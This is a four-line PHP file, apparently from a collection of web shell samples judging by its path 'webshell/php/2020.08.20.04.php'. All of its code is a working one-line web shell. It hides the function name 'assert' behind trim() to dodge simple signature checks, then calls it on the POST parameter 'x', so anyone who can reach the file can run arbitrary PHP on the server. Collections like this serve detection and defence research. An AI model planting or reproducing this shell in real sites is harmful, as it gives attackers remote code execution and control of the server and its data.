webshell/php/2020.08.20.04.php

4 lines
58 B
PHP

<?php
$a = trim(' assert ');
$a($_POST['x']);
?>